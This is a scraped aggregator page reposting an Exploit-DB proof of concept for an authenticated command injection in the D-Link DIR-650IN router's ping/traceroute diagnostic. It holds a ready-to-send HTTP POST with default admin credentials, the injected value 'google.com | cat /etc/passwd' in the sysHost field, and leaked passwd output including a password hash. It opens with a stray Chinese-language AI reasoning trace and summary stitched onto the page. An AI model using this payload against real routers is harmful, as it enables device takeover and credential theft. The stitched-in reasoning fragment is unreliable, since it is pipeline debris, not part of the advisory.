[webapps] D-Link DIR-650IN - Authenticated Command Injection
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户提供的文章是关于D-Link DIR-650IN路由器的一个漏洞,标题是“Authenticated Command Injection”。文章详细描述了这个漏洞,包括发现者、影响版本、测试环境等。 首先,我需要理解文章的主要内容。漏洞存在于诊断功能中的Ping或Traceroute部分,参数sysHost没有被正确过滤,导致攻击者可以注入系统命令。攻击者需要有认证权限,但即使是低权限的用户也能利用这个漏洞。成功利用后,攻击者可以读取敏感文件如/etc/passwd,进而完全控制路由器。 接下来,我需要将这些信息浓缩到100字以内。要抓住关键点:设备型号、漏洞类型、影响版本、攻击条件、后果以及利用方法。同时,语言要简洁明了,避免使用复杂的术语。 可能会遇到的问题是如何在有限的字数内涵盖所有重要信息。可能需要舍弃一些细节,比如具体的步骤或HTTP请求示例。重点放在漏洞的存在、影响和后果上。 最后,确保总结准确无误,并且符合用户的要求:直接描述内容,不需要特定的开头词。 </think> D-Link DIR-650IN路由器固件V1.04版本存在认证命令注入漏洞,攻击者可通过诊断功能注入系统命令读取敏感文件如/etc/passwd并完全控制设备。 2026-4-10 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
# Date: 2023-01-08
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
# Version: Firmware V1.04 (REQUIRED)
# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
# CVE: N/A (Version included now, previously missing)

Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.

The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.

Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.

HTTP PoC:
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded

submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply

Response Extract:
root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
            

文章来源: https://www.exploit-db.com/exploits/52508
如有侵权请联系:admin#unsafe.sh